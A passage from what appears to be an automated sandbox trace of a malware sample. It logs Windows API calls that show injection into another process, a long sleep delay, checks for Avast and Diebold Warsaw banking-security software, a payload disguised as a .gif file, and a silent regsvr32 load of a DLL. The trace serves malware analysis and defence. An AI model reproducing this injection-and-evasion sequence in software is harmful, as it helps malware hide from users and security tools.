[290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0261.075] ReadProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x7ffd4008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0261.075] VirtualAllocEx (hProcess=0x16c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0261.076] VirtualAlloc (lpAddress=0x1f44000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f44000
[0261.081] WriteProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x400000, lpBuffer=0x1f428b8*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1f428b8*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0261.093] WriteProcessMemory (in: hProcess=0x16c, lpBaseAddress=0x7ffd4008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0261.094] SetThreadContext (hThread=0x170, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd4000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14ff40, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0261.094] ResumeThread (hThread=0x170) returned 0x1
[0261.094] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0261.094] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0261.094] GlobalUnlock (hMem=0x189000c) returned 0
[0261.094] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0261.094] GlobalUnlock (hMem=0x1890004) returned 0
[0261.101] Sleep (dwMilliseconds=0xe74e)
[0271.122] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0271.122] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0271.122] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0271.122] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0271.122] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178
[0271.122] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0271.122] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0271.123] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0271.123] SetFilePointer (in: hFile=0x178, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0271.125] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0271.125] ReadFile (in: hFile=0x178, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0271.132] CloseHandle (hObject=0x178) returned 1
[0271.132] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.133] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.133] GlobalUnlock (hMem=0x189000c) returned 0
[0271.133] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0271.133] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.134] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.134] GlobalUnlock (hMem=0x189000c) returned 0
[0271.134] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0271.135] GlobalLock (hMem=0x189000c) returned 0x25f110
[0271.136] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0271.136] GlobalUnlock (hMem=0x189000c) returned 0
[0271.136] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0271.136] GlobalLock (hMem=0x189000c) returned 0x265120
[0271.137] GlobalHandle (pMem=0x265120) returned 0x189000c
[0271.137] GlobalUnlock (hMem=0x189000c) returned 0
[0271.137] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0271.137] GlobalLock (hMem=0x189000c) returned 0x265120
[0271.138] GlobalHandle (pMem=0x265120) returned 0x189000c
[0271.138] GlobalUnlock (hMem=0x189000c) returned 0
[0271.138] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0271.139] GlobalLock (hMem=0x189000c) returned 0x26f130
[0271.140] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0271.140] GlobalUnlock (hMem=0x189000c) returned 0
[0271.140] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0271.140] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.141] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.141] GlobalUnlock (hMem=0x189000c) returned 0
[0271.141] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0271.142] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.142] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.142] GlobalUnlock (hMem=0x189000c) returned 0
[0271.143] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0271.143] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.143] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.144] GlobalUnlock (hMem=0x189000c) returned 0
[0271.144] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0271.144] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.144] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.145] GlobalUnlock (hMem=0x189000c) returned 0
[0271.145] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0271.145] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.145] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.145] GlobalUnlock (hMem=0x189000c) returned 0
[0271.145] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0271.146] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.146] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.146] GlobalUnlock (hMem=0x189000c) returned 0
[0271.146] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0271.146] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.147] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.147] GlobalUnlock (hMem=0x189000c) returned 0
[0271.147] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0271.147] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.148] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.148] GlobalUnlock (hMem=0x189000c) returned 0
[0271.148] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0271.148] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.149] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.149] GlobalUnlock (hMem=0x189000c) returned 0
[0271.149] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0271.149] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.150] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.150] GlobalUnlock (hMem=0x189000c) returned 0
[0271.150] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0271.152] GlobalLock (hMem=0x189000c) returned 0x27b110
[0271.153] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0271.153] GlobalUnlock (hMem=0x189000c) returned 0
[0271.153] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0271.153] GlobalLock (hMem=0x189000c) returned 0x27b110
[0271.154] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0271.154] GlobalUnlock (hMem=0x189000c) returned 0
[0271.154] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0271.156] GlobalLock (hMem=0x189000c) returned 0x29f120
[0271.157] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0271.157] GlobalUnlock (hMem=0x189000c) returned 0
[0271.157] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0271.157] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.158] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.158] GlobalUnlock (hMem=0x189000c) returned 0
[0271.158] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0271.158] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.158] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.159] GlobalUnlock (hMem=0x189000c) returned 0
[0271.159] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0271.159] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.159] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.159] GlobalUnlock (hMem=0x189000c) returned 0
[0271.159] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0271.160] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.160] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.160] GlobalUnlock (hMem=0x189000c) returned 0
[0271.160] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0271.160] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.161] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.161] GlobalUnlock (hMem=0x189000c) returned 0
[0271.161] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0271.161] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.162] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.162] GlobalUnlock (hMem=0x189000c) returned 0
[0271.162] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0271.162] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.163] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.163] GlobalUnlock (hMem=0x189000c) returned 0
[0271.163] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0271.163] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.164] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.164] GlobalUnlock (hMem=0x189000c) returned 0
[0271.164] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0271.164] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.165] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.165] GlobalUnlock (hMem=0x189000c) returned 0
[0271.165] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0271.165] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.166] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.166] GlobalUnlock (hMem=0x189000c) returned 0
[0271.166] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0271.166] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.167] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.167] GlobalUnlock (hMem=0x189000c) returned 0
[0271.167] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0271.167] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.240] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.240] GlobalUnlock (hMem=0x189000c) returned 0
[0271.240] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0271.240] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.241] GlobalUnlock (hMem=0x189000c) returned 0
[0271.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0271.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0271.242] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0271.242] GlobalUnlock (hMem=0x189000c) returned 0
Process:
id = "25"
image_name = "regsvr32.exe"
filename = "c:\\windows\\system32\\regsvr32.exe"
page_root = "0x7f1be620"
os_pid = "0xf18"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\tempa\\marxvxinhhm64.dll\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2237
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2238
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2239
start_va = 0x40000
end_va = 0x41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2240
start_va = 0xf0000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2241
start_va = 0xa40000
end_va = 0xa46fff
entry_point = 0xa40000
region_type = mapped_file
name = "regsvr32.exe"
filename = "\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")
Region:
id = 2242
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2243
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2244
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
